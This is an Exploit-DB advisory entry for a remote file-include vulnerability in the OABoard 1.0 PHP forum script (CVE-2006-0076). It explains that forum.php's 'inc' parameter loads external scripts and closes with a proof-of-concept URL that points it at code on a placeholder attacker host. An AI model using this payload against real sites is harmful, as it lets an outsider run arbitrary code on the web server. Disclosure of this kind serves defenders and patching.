OABoard 1.0 Forum Script Remote File Include Vulnerability

2005-12-29T00:00:00
ID EDB-ID:26998
Type exploitdb
Reporter Aliaksandr Hartsuyeu
Modified 2005-12-29T00:00:00

Description

OABoard 1.0 Forum Script Remote File Include Vulnerability. CVE-2006-0076. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/16105/info

The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application.

This could result in the execution of arbitrary PHP code in the context of the webserver hosting the application. 

http://oaboard.example.com/oaboard_en/forum.php?inc=http://attacker.example.com/code.php